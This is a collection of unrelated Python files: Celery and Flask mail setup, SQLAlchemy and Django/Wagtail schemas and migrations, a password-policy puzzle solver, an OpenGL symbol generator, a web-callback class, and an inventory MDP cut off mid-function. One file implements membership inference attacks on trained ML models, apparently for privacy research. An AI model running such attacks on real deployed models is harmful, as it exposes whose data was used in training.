from celery import Celery
from flask import render_template
from flask_mail import Message
import celery_conf
app = Celery(__name__)
# load the Celery settings from the configuration module
app.config_from_object(celery_conf)
# @app.tasks
# def send_email(reciver,url,u_id,mail, cache):
#
# msg = Message("欢迎注册爱鲜蜂后台管理",
# [reciver],
# sender="1395947683"
# )
# msg.html = render_template("active.html",url=url)
# mail.send(msg)
# # build the cache key from the activation URL
# key = url.split("/")[-1]
# cache.set(key,u_id,time_out=60*60)
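# A hedged sketch of the commented-out task above with the obvious fixes applied:
# `@app.task` (singular) is the Celery decorator, most Flask cache backends take
# `timeout` rather than `time_out`, and `mail`/`cache` are assumed to be the
# Flask-Mail and cache instances supplied by the caller.
@app.task
def send_email(receiver, url, u_id, mail, cache):
    msg = Message("欢迎注册爱鲜蜂后台管理", [receiver], sender="1395947683")
    msg.html = render_template("active.html", url=url)
    mail.send(msg)
    # use the token at the end of the activation URL as the cache key
    key = url.split("/")[-1]
    cache.set(key, u_id, timeout=60 * 60)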
|
"""Contains the schemas for the tables in the database.
"""
from . import engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Boolean
Base = declarative_base()
class User(Base):
"""Represents the contents of the user table.
"""
__tablename__ = "user"
uuid = Column(String, primary_key=True)
username = Column(String)
email = Column(String)
password = Column(String)
is_active = Column(Boolean, default=True)
@property
def data_dict(self):
return {
"uuid": self.uuid,
"username": self.username,
"email": self.email,
"password": self.password,
"is_active": self.is_active,
}
def initializeDatabase():
"""Makes the database usable by creating all of the tables.
"""
Base.metadata.create_all(engine.engine)
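# A minimal usage sketch (illustrative values; assumes the sibling `engine`
# module exposes `engine.engine`, as used by initializeDatabase above):
#
#     from sqlalchemy.orm import sessionmaker
#     initializeDatabase()
#     session = sessionmaker(bind=engine.engine)()
#     session.add(User(uuid="example-uuid", username="alice",
#                      email="alice@example.com", password="hashed-password"))
#     session.commit()
#     print([user.data_dict for user in session.query(User).all()])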
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-12 18:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtailstreamfieldforms.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0040_page_draft_title'),
]
operations = [
migrations.CreateModel(
name='HomePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('author', models.CharField(max_length=255)),
('date', models.DateField(verbose_name='Post Date')),
('body', wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='heading')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('singlelinefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('default_value', wagtail.core.blocks.CharBlock(required=False))))), ('multilinefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('default_value', wagtail.core.blocks.CharBlock(required=False))))), ('numberfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('emailfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('urlfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('checkboxfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('default_checked', wagtail.core.blocks.BooleanBlock(default=False, required=False))))), ('dropdownfield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('choices', wagtail.core.blocks.ListBlock(wagtailstreamfieldforms.blocks.FieldChoiceBlock)), ('allow_multiple_selections', wagtail.core.blocks.BooleanBlock(default=False, required=False))))), ('radiofield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)), ('choices', wagtail.core.blocks.ListBlock(wagtailstreamfieldforms.blocks.FieldChoiceBlock))))), ('datefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False))))), ('datetimefield', wagtail.core.blocks.StructBlock((('label', wagtail.core.blocks.CharBlock()), ('required', wagtail.core.blocks.BooleanBlock(default=False, required=False)), ('help_text', wagtail.core.blocks.CharBlock(required=False)))))))),
('submit_label', models.CharField(default='Submit', max_length=255)),
('submitted_body', wagtail.core.fields.StreamField((('heading', wagtail.core.blocks.CharBlock(classname='heading')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())))),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
|
# count valid passwords according to company policy:
# i.e. given a list of strings in the form "policy char: password"
# does the password contain a number of the characters char that fall within the bounds of the policy
# for example:
# 1-3 a: abcde is *valid* because the password contains 1 'a' (between 1 and 3)
# 1-3 b: cdefg is *invalid* because the password contains 0 b's (not between 1 and 3)
# 2-9 c: ccccccccc is *valid* because the password contains 9 'c's (between 2 and 9)
# Part b:
# does the password contain char at either position of the policy (and not at both positions)
# note: policy indices are 1-based, not 0-based
# for example:
# 1-3 a: abcde is *valid* because 'a' exists at index 1 and not at index 3
# 1-3 b: cdefg is *invalid* because 'b' does not exist at index 1 or 3
# 2-9 c: ccccccccc is *invalid* because 'c' exists at both indices 2 and 9
# ---- Part a: O(lines * len(password)) time complexity / constant O(1) space complexity ----
# ---- Part b: linear O(n) time complexity / constant O(1) space complexity ----
def validate(lines, part):
count = 0
for line in lines:
# unpack space-separated components
rule, letter, pw = line.split()
# unpack bounds from rule
lower, upper = map(int, rule.split('-'))
if part == 'a':
# count if the number of char falls in the bounds
count += lower <= pw.count(letter[0]) <= upper
else:
# count if either position (1-indexed) contains letter, but not both (xor)
count += (pw[lower-1] == letter[0]) ^ (pw[upper-1] == letter[0])
return count
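# Quick self-check against the sample policies from the comments above
# (expected: part a -> 2 valid, part b -> 1 valid).
SAMPLE = ['1-3 a: abcde', '1-3 b: cdefg', '2-9 c: ccccccccc']
assert validate(SAMPLE, 'a') == 2
assert validate(SAMPLE, 'b') == 1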
if __name__ == '__main__':
lines = [line for line in open('day2.txt')]
print(f"Part a: found {validate(lines, 'a')} valid passwords of {len(lines)}")
print(f"Part b: found {validate(lines, 'b')} valid passwords of {len(lines)}")
|
import os
from pint import UnitRegistry
# load up the registry to be used everywhere
ureg = UnitRegistry()
# add currency as a type of unit since it is not part of the default
ureg.define('usd = [currency]')
Q_ = ureg.Quantity
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
CREDIT = "CREDIT"
CHECKING = "CHECKING"
VALID_ACCT_TYPES = [CREDIT,CHECKING]
FOREVER_RECURRING = "recurring payment like forever"
# FOR BOKEH PLOTS
TOOLTIPS = [
("(x,y)", "($x, $y)"),
]
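# A small usage sketch of the registry defined above: the custom `usd` unit
# behaves like any other pint unit (values are purely illustrative):
#
#     price = Q_(10, 'usd')
#     price + Q_(2.5, 'usd')                    # 12.5 usd
#     (price / Q_(2, 'hour')).to('usd / minute')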
|
from sqlalchemy import (create_engine, Column, Integer, MetaData,
select, String, Table)
meta = MetaData()
artists = Table('artists', meta,
Column('ArtistId', Integer, primary_key=True),
Column('Name', String)
)
DATABASE_FILE = 'sqlalchemy.db'
db = create_engine('sqlite:///{}'.format(DATABASE_FILE))
# Create tables
artists.create(db)
conn = db.connect()
conn.execute(artists.insert(), [
{'Name': 'AC/DC'},
{'Name': 'Led Zeppelin'}
])
stmt = select([artists])
print(conn.execute(stmt).fetchall())
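# A small follow-up sketch (SQLAlchemy 1.x Core style, matching the select([...])
# call above): the same connection also supports filtered selects.
print(conn.execute(select([artists]).where(artists.c.Name == 'AC/DC')).fetchall())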
# Drop tables
artists.drop(db)
|
from typing import Union, List, Callable, Any, Iterable
from collections import OrderedDict
from .interact_in import InteractIn
from .interact_out import InteractOut
from ..defaults import INTERACT_SUBDOMAIN
class BaseInteract:
def __init__(self):
self.id = None
self.inputs_args = None
self.inputs_kwargs = None
self.output_dict = None
self.api_point = None
self.processor = None
class Interact:
"""Interact class stores, reports, and chains interaction functions
:example:
        Interact(InteractIn(html_input_element),
                 InteractOut(dom_output_element),
                 update_output_div
                 )
        Interact(InteractIn(inp.id, "value", key="key_word_name"),
                 InteractOut(output.id, "content"),
                 update_output_div
                 )
        def update_output_div(key_word_name=None):
            pass
DESIGN QUESTION:
- ABLE TO CHAIN INTERACT OBJECT?
- POSSIBLE TO DO CHANGE-SENSITIVE INPUTS?
- update chains and objects before receiving from api
"""
# keep track of all ids
interact_ids = set()
def __init__(
self,
input: Union[InteractIn, List[InteractIn]],
output: Union[InteractOut, List[InteractOut]],
func: Callable[..., Any],
):
# Interaction ID
# Make it easy for the client to refer and retrieve
self.id = self.generate_id(interact_ids=self.interact_ids)
# Store all input items. For rendering.
self.inputs = []
        # COMPILED UPON REQUEST
        # This will be compiled upon request from inputs_args_names
# lazy loading: pass to function
# :Example: func(*inputs_args)
self.inputs_args = []
# Store the func arg names in order
        # this method is preferred as introspection allows easier debugging
# arg name's convention : id_attribute-name
# :Example: [id1_attr1, id2_attr2]
self.inputs_args_names = []
# dictionary of argname-value pair for fast update
# :Example: {id1_attr1: value, id2_attr2: value}
self.values_dict = {}
        # COMPILED UPON REQUEST
# dictionary of kwargs that will be compiled upon request
# pass to function
# func(**inputs_kwargs)
self.inputs_kwargs = {}
# dictionary of kwargs-arg-name pair
# :Example: {kwarg_name: arg_name}
self.inputs_kwargs_names = {}
# INPUT VARIABLES
# input will take either a list or an input object
# from each input element, need to get id, attribute and value
# :namespace: id_html-attribute
self.__input_name_space = "{identity}_{attribute}"
# convert it into a list to make code cleaner
# don't need to separate method of handling single obj or list
input = [input] if not isinstance(input, list) else input
# TODO: use builder pattern for this
if isinstance(input, list):
for i in input:
if isinstance(i, InteractIn):
# Interact_In should be in charge of making sure
# that id, attribute and value are ready to be used
if i.identity and i.attribute:
name_space = self.__input_name_space.format(
identity=i.identity, attribute=i.attribute
)
self.inputs.append(i)
if hasattr(i, "value"):
if not i.key:
# store in order
self.inputs_args_names.append(name_space)
else:
# store with keyword
self.inputs_kwargs_names[i.key] = name_space
self.values_dict[name_space] = i.value
else:
raise TypeError(f"{i} {type(i)} need to be of type: InteractIn")
# OUTPUT VARIABLES
# Store all output elements. For rendering.
self.outputs = []
# Output information
        # :Example: output = {"id_123": {attribute:"figure", type:"Graph", data:{} }, ...}
# output should also be in order
# output should also support dictionary mapping to id
self.output_dict = OrderedDict()
self.output_format = ["attribute", "dom_type", "data"]
# PROCESS OUTPUT
output = [output] if not isinstance(output, list) else output
if isinstance(output, list):
for j in output:
if isinstance(j, InteractOut):
# NOTE: Should we generate initial output value from the current input values?
# Option to trigger process later after function is collected
if j.identity and j.attribute:
self.output_dict[j.identity] = {
self.output_format[0]: j.attribute,
self.output_format[1]: j.dom_type,
self.output_format[2]: None,
}
self.outputs.append(j)
else:
raise TypeError(f"{j} {type(j)} need to be of type: InteractOut")
# CALLBACK
# function chain should be in order
# NOTE FUTURE: Able to use class and not just function?
self.function_chain = []
if callable(func):
self.processor = func
# should check if input matches output
self.function_chain.append(func)
# GENERATE API
        # the api name format will be used as the api url
# it must be unique, and should be informative
# NOTE: comply with url naming convention ?
# TO LET USERS CHANGE THIS IN DEFAULT
self.api_subdomain = INTERACT_SUBDOMAIN
__api_name_format = "{id}"
__required_names = {"id": self.id}
self.api_point = self._generate_api_point(
__api_name_format,
self.api_subdomain,
additional_parameters=__required_names,
)
""" ID METHODS
"""
def generate_id(
self, *, curr_tries: int = 1, max_tries: int = 10, interact_ids: set = None
) -> int:
# id generator for Interact Object
# uses cls.interact_ids to keep track
interact_ids = interact_ids if interact_ids else self.interact_ids
if curr_tries > max_tries:
raise Exception("Unable to generate id for Interact object.")
        if len(interact_ids) == 0:
            interact_ids.add(0)
            return 0
        new_id = max(interact_ids) + curr_tries
        if new_id not in interact_ids:
            interact_ids.add(new_id)
            return new_id
        elif curr_tries <= max_tries:
            return self.generate_id(curr_tries=curr_tries + 1, interact_ids=interact_ids)
""" API METHODS
"""
def _generate_api_point(
        self, name_format: str, subdomain: str, additional_parameters: dict = None
):
api_point = (
"/" + subdomain + "/" + name_format.format(id=additional_parameters["id"])
)
return api_point
""" CHAIN METHODS
"""
def chain_calls(self, function_chain: list):
# TODO: Given a list of functions, pass output to input
# for x in function_chain:
pass
""" PROPERTY METHODS
"""
@property
def inputs_args(self):
return self.__compile_args(self.inputs_args_names, self.values_dict)
@inputs_args.setter
def inputs_args(self, values: list):
if isinstance(values, list):
return values
@property
def inputs_kwargs(self):
return self.__compile_kwargs(self.inputs_kwargs_names, self.values_dict)
@inputs_kwargs.setter
def inputs_kwargs(self, values: dict):
if isinstance(values, dict):
return values
def __compile_args(self, inputs_args_names: list, values_dict: dict):
# lazy loading of arguments
# NOTE: how to keep track of changes? Possible?
compiled_list = []
for name in inputs_args_names:
compiled_list.append(values_dict[name])
return compiled_list
def __compile_kwargs(self, inputs_kwargs_names: dict, values_dict: dict):
# lazy loading of keyword arguments
# NOTE: how to keep track of changes? Possible?
compiled_dict = {}
for key, name in inputs_kwargs_names.items():
compiled_dict[key] = values_dict[name]
return compiled_dict
""" UPDATE METHODS
"""
def _update_single_input(self, id, attribute, new_value, values_dict=None):
i = {"identity": id, "attribute": attribute}
search_key = self.__input_name_space.format(
identity=i["identity"], attribute=i["attribute"]
)
values_dict = values_dict if values_dict else self.values_dict
if values_dict.get(search_key, None):
values_dict[search_key] = new_value
return True
else:
raise KeyError(
f"{search_key} cannot be found in Interact input values vault"
)
def update(self, json_data: dict):
# Template method
        # proposed update process
        # json_data will be a dictionary or list of HTML element information
# NOTE: request data should be in dict form.
# Container should be in charge of compiling it into a generic format
# 1. get json put request data
# NOTE FORMAT should be in dict form
# :Example: {index: {"id":id, "attribute":attr, "value":val}}
if isinstance(json_data, dict):
for o in json_data.values():
self._update_single_input(o["id"], o["attribute"], o["value"])
return True
return False
""" OUTPUT METHODS
"""
def process(self):
# NOTE: template function that the client will be using
arg_list = self.inputs_args
kwargs_dict = self.inputs_kwargs
processor = self.processor
outputs_dict = self.output_dict
outputs_dict = self._process(arg_list, kwargs_dict, outputs_dict, processor)
return outputs_dict
def _process_inputs(self, inputs_args: Iterable, inputs_kwargs: dict, processor):
# This is the main processing method
# compile
if len(inputs_args) or len(inputs_kwargs):
result = processor(*inputs_args, **inputs_kwargs)
# TODO: how do I handle multiple outputs of diff. type?
# it should be able to accept list or tuple
        # what about a dictionary?
if isinstance(result, (list, tuple, set, dict)):
return result
else:
return [result]
def _update_outputs(self, results, outputs: List[dict]) -> List[dict]:
# UPDATE
# update each output in the order of specification
        for idx, key in enumerate(outputs):
            outputs[key]["data"] = results[idx]
return outputs
def _process(
self,
arg_list: list,
kwargs_dict: dict,
outputs: List[dict],
processor: Callable,
):
# NOTE: main process controller
        # process inputs with the function and update the output data
# PROCESSS
if self.processor:
results = self._process_inputs(arg_list, kwargs_dict, processor)
# TODO: where should i check that function
# return the same no. of outputs?
if results and len(results) == len(outputs):
# UPDATE
return self._update_outputs(results, outputs)
else:
raise Exception(
f"No. of outputs {len(outputs)} doesn't match the return of {len(results)} results"
)
else:
raise Exception("Requires a processing function.")
""" HTTP METHODS
"""
def http_response(self, request_method, request_data, request):
if request_method == "POST":
response = self._post_response(request_data, request)
elif request_method == "PUT":
response = self._put_response(request)
elif request_method == "GET":
response = self._get_response(request_data)
else:
raise Exception("Invalid HTTP request")
return response
    def _post_response(self, request_data, request):
        # behaves the same as PUT
        return self._put_response(request)
def _put_response(self, request):
request_data = request.get_json()
# 1. Update values
if self.update(request_data):
            # if updated successfully, process and return output values
response_dict = self.process()
return response_dict
else:
# TODO: flask need to implement error handler
raise Exception("Unable to update data")
def _get_response(self, request_data):
response_dict = self.process()
if response_dict:
return response_dict
raise Exception("Unable to get output results")
""" JSON METHODS
"""
def render(self):
# NOTE: non-functional; uses global variables
# this is only used for setting up the interaction on client-side
inputs_dict = {}
outputs_dict = {}
for i, element in enumerate(self.inputs):
# NOTE: right now we are getting it from InteractIn objects
# shouldn't we get it from interact storage instead?
inputs_dict[i] = {
"id": element.identity,
"dom_type": element.dom_type,
"attribute": element.attribute,
}
for i, element in enumerate(self.outputs):
outputs_dict[i] = {
"id": element.identity,
"dom_type": element.dom_type,
"attribute": element.attribute,
}
render_format = {
"input": inputs_dict,
"output": outputs_dict,
"api_point": self.api_point,
}
return render_format
|
#!/usr/bin/env python3
"""
License statement applies to this file (glgen.py) only.
"""
"""
Permission is hereby granted, free of charge,
to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
import os
import re
banned_ext = [ 'AMD', 'APPLE', 'NV', 'NVX', 'ATI', '3DLABS', 'SUN', 'SGI', 'SGIX', 'SGIS', 'INTEL', '3DFX', 'IBM', 'MESA', 'GREMEDY', 'OML', 'PGI', 'I3D', 'INGL', 'MTX', 'QCOM', 'IMG', 'ANGLE', 'SUNX', 'INGR' ]
def noext(sym):
for ext in banned_ext:
if sym.endswith(ext):
return False
return True
def fix_multiline_functions(lines):
fixed_lines = []
temp_lines = []
for line in lines:
if line.count('(') > line.count(')'):
temp_lines.append(line)
else:
if len(temp_lines) > 0:
if line.count(')') > line.count('('):
temp_lines.append(line)
fixed_line = re.sub(' +',' ', ''.join(temp_lines).replace('\n','').replace('\t',''))
fixed_lines.append(fixed_line)
temp_lines = []
else:
temp_lines.append(line)
else:
fixed_lines.append(line)
return fixed_lines
def find_gl_symbols(lines):
typedefs = []
syms = []
for line in lines:
m = re.search(r'^typedef.+PFN(\S+)PROC.+$', line)
g = re.search(r'^.+(gl\S+)\W*\(.+\).*$', line)
if m and noext(m.group(1)):
typedefs.append(m.group(0).replace('PFN', 'RGLSYM').replace('GLDEBUGPROC', 'RGLGENGLDEBUGPROC'))
if g and noext(g.group(1)):
syms.append(g.group(1))
return (typedefs, syms)
def generate_defines(gl_syms):
res = []
for line in gl_syms:
res.append('#define {} __rglgen_{}'.format(line, line))
return res
def generate_declarations(gl_syms):
return ['RGLSYM' + x.upper() + 'PROC ' + '__rglgen_' + x + ';' for x in gl_syms]
def generate_macros(gl_syms):
return [' SYM(' + x.replace('gl', '') + '),' for x in gl_syms]
def dump(f, lines):
f.write('\n'.join(lines))
f.write('\n\n')
if __name__ == '__main__':
if len(sys.argv) > 4:
for banned in sys.argv[4:]:
banned_ext.append(banned)
with open(sys.argv[1], 'r') as f:
lines = fix_multiline_functions(f.readlines())
typedefs, syms = find_gl_symbols(lines)
overrides = generate_defines(syms)
declarations = generate_declarations(syms)
externs = ['extern ' + x for x in declarations]
macros = generate_macros(syms)
with open(sys.argv[2], 'w') as f:
f.write('#ifndef RGLGEN_DECL_H__\n')
f.write('#define RGLGEN_DECL_H__\n')
f.write('#ifdef __cplusplus\n')
f.write('extern "C" {\n')
f.write('#endif\n')
f.write('#ifdef GL_APIENTRY\n')
f.write('typedef void (GL_APIENTRY *RGLGENGLDEBUGPROC)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('typedef void (GL_APIENTRY *RGLGENGLDEBUGPROCKHR)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('#else\n')
f.write('#ifndef APIENTRY\n')
f.write('#define APIENTRY\n')
f.write('#endif\n')
f.write('#ifndef APIENTRYP\n')
f.write('#define APIENTRYP APIENTRY *\n')
f.write('#endif\n')
f.write('typedef void (APIENTRY *RGLGENGLDEBUGPROCARB)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('typedef void (APIENTRY *RGLGENGLDEBUGPROC)(GLenum, GLenum, GLuint, GLenum, GLsizei, const GLchar*, GLvoid*);\n')
f.write('#endif\n')
f.write('#ifndef GL_OES_EGL_image\n')
f.write('typedef void *GLeglImageOES;\n')
f.write('#endif\n')
f.write('#if !defined(GL_OES_fixed_point) && !defined(HAVE_OPENGLES2)\n')
f.write('typedef GLint GLfixed;\n')
f.write('#endif\n')
f.write('#if defined(OSX) && !defined(MAC_OS_X_VERSION_10_7)\n')
f.write('typedef long long int GLint64;\n')
f.write('typedef unsigned long long int GLuint64;\n')
f.write('typedef unsigned long long int GLuint64EXT;\n')
f.write('typedef struct __GLsync *GLsync;\n')
f.write('#endif\n')
dump(f, typedefs)
dump(f, overrides)
dump(f, externs)
f.write('struct rglgen_sym_map { const char *sym; void *ptr; };\n')
f.write('extern const struct rglgen_sym_map rglgen_symbol_map[];\n')
f.write('#ifdef __cplusplus\n')
f.write('}\n')
f.write('#endif\n')
f.write('#endif\n')
with open(sys.argv[3], 'w') as f:
f.write('#include "glsym/glsym.h"\n')
f.write('#include <stddef.h>\n')
f.write('#define SYM(x) { "gl" #x, &(gl##x) }\n')
f.write('const struct rglgen_sym_map rglgen_symbol_map[] = {\n')
dump(f, macros)
f.write(' { NULL, NULL },\n')
f.write('};\n')
dump(f, declarations)
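# Example invocation (file names are illustrative): parse an OpenGL extension
# header and emit the declaration header (argv[2]) and the symbol-map source
# (argv[3]); any further arguments are treated as extra banned extension suffixes.
#
#     python3 glgen.py glext.h glsym_gl.h rglgen_gl.c WIN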
|
import torch.nn as nn
from torch.autograd import Variable
import torch
from immediate_sensitivity_primitives import grad_immediate_sensitivity
import numpy as np
# returns counts rather than counts over thresh
def merlin(model, inputs, labels, lf):
if type(inputs) == np.ndarray:
inputs = torch.from_numpy(inputs).float()
if type(labels) == np.ndarray:
        labels = torch.from_numpy(labels).float()
sigma = .01
T = 100
loss_function = lf(reduction='none')
inp = Variable(inputs, requires_grad=False)
with torch.no_grad():
inp = inp.to(torch.cuda.current_device())
outputs = model.forward(inp)
labels = labels.to(torch.cuda.current_device())
loss = loss_function(torch.squeeze(outputs), torch.squeeze(labels))
counts = torch.zeros(len(loss)).to(torch.cuda.current_device())
for i in range(T):
with torch.no_grad():
noisy_inp = inp + (sigma * torch.randn(1, device=torch.cuda.current_device()))
noisy_outputs = model.forward(noisy_inp)
noisy_loss = loss_function(torch.squeeze(noisy_outputs), torch.squeeze(labels))
gt = noisy_loss > loss
counts += gt
return counts.cpu(), [float(l) for l in loss.cpu()]
def run_merlin(model, thresh, X_target, y_target, lf=nn.MSELoss):
counts, train_loss = merlin(model,
X_target,
y_target, lf)
pass_inf = counts > thresh
return sum(pass_inf) / len(pass_inf)
def merlin_optimal_thresh(model, train_loader, test_loader, lf=nn.MSELoss, num_batches=None, tpr = False):
train_bs = train_loader.batch_size
test_bs = test_loader.batch_size
if num_batches is None:
train_counts = np.zeros(len(train_loader.dataset))
test_counts = np.zeros(len(test_loader.dataset))
else:
train_counts = np.zeros(train_bs * num_batches)
test_counts = np.zeros(test_bs * num_batches)
for i, (inputs, labels) in enumerate(train_loader):
if num_batches is not None and i >= num_batches:
break
idx = i * train_bs
counts, _ = merlin(model, inputs, labels, lf)
train_counts[idx : (idx + len(labels))] = counts
for i, (inputs, labels) in enumerate(test_loader):
if num_batches is not None and i >= num_batches:
break
idx = i * test_bs
counts, _ = merlin(model, inputs, labels, lf)
test_counts[idx : (idx + len(labels))] = counts
max_thresh = 0
max_adv = 0
mtpr = 0
mfpr = 0
for i in range(0, 100):
train_pos = train_counts > i
test_pos = test_counts > i
train_rat = sum(train_pos)/len(train_pos)
test_rat = sum(test_pos)/len(test_pos)
adv = train_rat - test_rat
if adv > max_adv:
max_thresh = i
max_adv = adv
mtpr = train_rat
mfpr = test_rat
if tpr:
return max_adv, max_thresh, mtpr, mfpr
return max_adv, max_thresh
def run_merlin_loader(model, thresh, loader, lf=nn.MSELoss):
ratios = []
for inputs, labels in loader:
ratios.append(run_merlin(model, thresh, inputs, labels, lf))
torch.cuda.empty_cache()
return sum(ratios)/len(ratios)
def gaussian_pdf(sd, x):
if sd <= 0:
raise ValueError('standard deviation must be positive but is {}'.format(sd))
else: # sd > 0
        # include the 1/sqrt(2*pi) normalization so this is a proper Gaussian pdf
        return np.exp(-0.5 * (x / sd) ** 2) / (sd * np.sqrt(2 * np.pi))
def membership_inf(model, avg_train_loss, inputs, labels, lf=nn.MSELoss(reduction='none')):
inputs = inputs.to(torch.cuda.current_device())
outputs = model.forward(inputs)
labels = labels.to(torch.cuda.current_device())
loss = lf(torch.squeeze(outputs), labels)
loss = [l.item() for l in loss]
pass_inf = [1 if abs(l) < avg_train_loss else 0 for l in loss]
return pass_inf
def run_membership_inference_attack(model, avg_train_l, X_target, y_target, lf=nn.MSELoss(reduction='none')):
if type(X_target) == np.ndarray:
X_target = torch.from_numpy(X_target).float()
if type(y_target) == np.ndarray:
y_target = torch.from_numpy(y_target).float()
pass_inf = membership_inf(model,
avg_train_l,
X_target,
y_target, lf)
return sum(pass_inf)/len(pass_inf)
def run_yeom_loader(model, avg_train_l, loader, lf=nn.MSELoss, num_batches=None):
ratios = []
lf = lf(reduction='none')
with torch.no_grad():
for i, (inputs, labels) in enumerate(loader):
if (num_batches is not None) and i >= num_batches:
break
torch.cuda.empty_cache()
ratios.append(run_membership_inference_attack(model, avg_train_l, inputs, labels, lf))
return sum(ratios)/len(ratios)
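# A hedged smoke-test sketch for the Yeom-style attack helpers above. It assumes
# a CUDA device is available (the functions move tensors to
# torch.cuda.current_device()) and uses a throwaway linear model with random
# data purely for illustration.
if __name__ == '__main__':
    from torch.utils.data import DataLoader, TensorDataset
    model = nn.Linear(5, 1).cuda()
    X, y = torch.randn(64, 5), torch.randn(64)
    loader = DataLoader(TensorDataset(X, y), batch_size=16)
    # the average training loss acts as the membership decision threshold
    with torch.no_grad():
        avg_train_loss = nn.MSELoss()(torch.squeeze(model(X.cuda())), y.cuda()).item()
    print('fraction flagged as members:', run_yeom_loader(model, avg_train_loss, loader))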
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-09-01 12:35
from __future__ import unicode_literals
from django.db import migrations, models
from django.db.models import Q
def update_caches(apps, schema_editor):
from wagtail_svgmap.models import ImageMap
for image_map in ImageMap.objects.filter(Q(_width_cache=0) | Q(_height_cache=0)).iterator():
image_map.recache_svg(save=True)
class Migration(migrations.Migration):
dependencies = [
('wagtail_svgmap', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='imagemap',
name='_height_cache',
field=models.FloatField(db_column='height_cache', default=0, editable=False),
),
migrations.AddField(
model_name='imagemap',
name='_width_cache',
field=models.FloatField(db_column='width_cache', default=0, editable=False),
),
migrations.RunPython(
update_caches,
reverse_code=migrations.RunPython.noop,
)
]
|
from discrete_world.space import infiniteTimeSpace
from discrete_world.mdp import infiniteTime
from utilities.counters import Timer
import matplotlib.pyplot as plt
from matplotlib import cm
import matplotlib as mpl
from matplotlib.colors import ListedColormap,LinearSegmentedColormap
from utilities.utilities import norm
import numpy as np
import torch as pt
from scipy.stats import poisson
class inventorySpace(infiniteTimeSpace):
"""
    Implements the space class for the inventory control MDP
"""
def __init__(self, actions, states, dem_distr, M, f, c, h, K, _lambda, lambda_e_1=False):
self.dem_distr = dem_distr
self.M = M
self.QQ = dict()
self.pmf = dict()
self.cdf = dict()
self.A = actions
self.S = states
self.adm_A = NotImplemented
self.Q = NotImplemented
self.h = h
self.c = c
self.f = f
self.K = K
self._lambda = _lambda
self.O = dict()
self.F = dict()
self.rew = dict()
self.lambda_e_1 = lambda_e_1
self.build_distr()
self.build_admisible_actions()
self.build_kernel()
self.build_reward()
def build_admisible_actions(self):
"""
        Builds the admissible actions function for the inventory MDP
"""
def adm_A(s):
return list(range(self.M - s + 1))
self.adm_A = adm_A
def build_kernel(self):
"""
        Builds the stochastic kernel function for the inventory MDP
"""
def Q(s, a):
if (s, a) in self.QQ.keys():
return self.QQ[s, a]
else:
distr = np.zeros(shape=(1, len(self.S)))
distrdic = {}
for j_s, j in enumerate(self.S):
if self.M >= j > s + a:
distr[0][j] = 0
elif self.M >= s + a >= j > 0:
